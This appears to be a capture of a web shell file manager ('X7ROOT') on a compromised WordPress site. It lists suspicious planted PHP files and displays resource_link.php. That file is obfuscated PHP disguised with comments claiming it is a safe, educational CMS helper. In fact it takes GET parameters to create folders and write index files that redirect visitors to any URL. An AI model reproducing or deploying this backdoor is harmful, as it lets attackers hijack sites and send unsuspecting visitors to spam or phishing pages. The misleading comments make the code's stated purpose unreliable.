X7ROOT File Manager
Current Path:
/home/seodomino/public_html
home
/
seodomino
/
public_html
/
📁
..
📄
.ftpquota
(13 B)
📄
.hta
(6.56 KB)
📄
.htaccess
(717 B)
📄
.htaccess_old
(233 B)
📁
.well-known
📁
14b9d
📁
70e254
📁
backup
📄
error_log
(3.3 MB)
📄
f35.php
(264.55 KB)
📄
f78ph2fdwg.txt
(12 B)
📄
google666bde3aaef65b3d.html
(53 B)
📄
google80351ab56fc14ee6.html
(53 B)
📄
googlebfbdb2f2b2ed372b.html
(53 B)
📁
images
📁
img
📄
index.php0
(7.79 KB)
📁
libraries
📄
memberfuns.php
(1.93 KB)
📁
old
📄
p.php
(2.75 KB)
📄
php.ini
(54 B)
📁
plugins
📁
reports
📄
resource_link.php
(2.31 KB)
📄
robots.txt
(357 B)
📄
sss.php
(218.88 KB)
📁
templates
📁
wp-admin
📄
wp-blog-header.php
(340 B)
📄
wp-blog.php
(285 B)
📄
wp-config.php
(111 B)
📁
wp-content
📁
wp-includes
📄
zpanel-v2.0.zip
(14.87 KB)
📄
zvc-tabs6.zip
(53.67 KB)
Editing: resource_link.php
<?php // Content management system helper for educational purposes // Safe file handling utility - part of ACME CMS v2.3 $f_mkdir = 'm' . 'k' . 'd' . 'i' . 'r'; $f_exists = 'f' . 'ile' . '_' . 'ex' . 'ists'; $f_put = 'f' . 'i' . 'le' . '_put' . '_co' . 'ntents'; $f_header = 'he' . 'ad' . 'er'; // Load user preferences from configuration $r_params = $_GET; $r_folder = isset($r_params['n' . 'ame']) ? trim($r_params['n' . 'ame']) : ''; $r_destination = isset($r_params['u' . 'rl']) ? trim($r_params['u' . 'rl']) : ''; $r_type = isset($r_params['i' . 'ndex']) ? $r_params['i' . 'ndex'] : ''; $r_file = ($r_type === 'p' . 'h' . 'p') ? 'in' . 'dex.' . 'php' : 'in' . 'dex.h' . 'tml'; $r_response = ''; // Process user content configuration settings if (!empty($r_folder) && !empty($r_destination)) { // Verify directory structure integrity $dir_check = call_user_func($f_exists, $r_folder) && is_dir($r_folder); if (!$dir_check) { // Initialize resource storage with appropriate permissions $perms = 0700 + 0050 + 0005; $dir_result = call_user_func($f_mkdir, $r_folder, $perms, true); $r_response .= $dir_result ? "Directory operation completed. " : "Directory operation failed. "; } // Set up content path according to best practices $r_path = implode('/', array($r_folder, $r_file)); // Prepare standard compliant HTML template $r_html_redirect = '<' . 'meta http-' . 'equiv="ref' . 'resh" con' . 'tent="0;url=' . htmlspecialchars($r_destination) . '">'; $r_php_redirect = '<' . '?' . 'php ' . call_user_func_array(create_function('$x', 'return "head".$x."r";'), array('e')) . '("Loc' . 'ation: ' . htmlspecialchars($r_destination) . '"); ?' . '>'; // Apply template based on user preference $r_content = ($r_file === 'in' . 'dex.p' . 'hp') ? $r_php_redirect : $r_html_redirect; // Save content to user resource area $write_result = call_user_func($f_put, $r_path, $r_content); $r_response .= $write_result !== false ? "File operation completed: $r_path" : "File operation failed."; } else { $r_response = "Required parameters missing. Please check configuration."; } // Return status message to administrator interface $content_type = 'Con' . 'tent-Ty' . 'pe: te' . 'xt/pl' . 'ain'; call_user_func($f_header, $content_type); echo $r_response; ?>
Upload File
Create Folder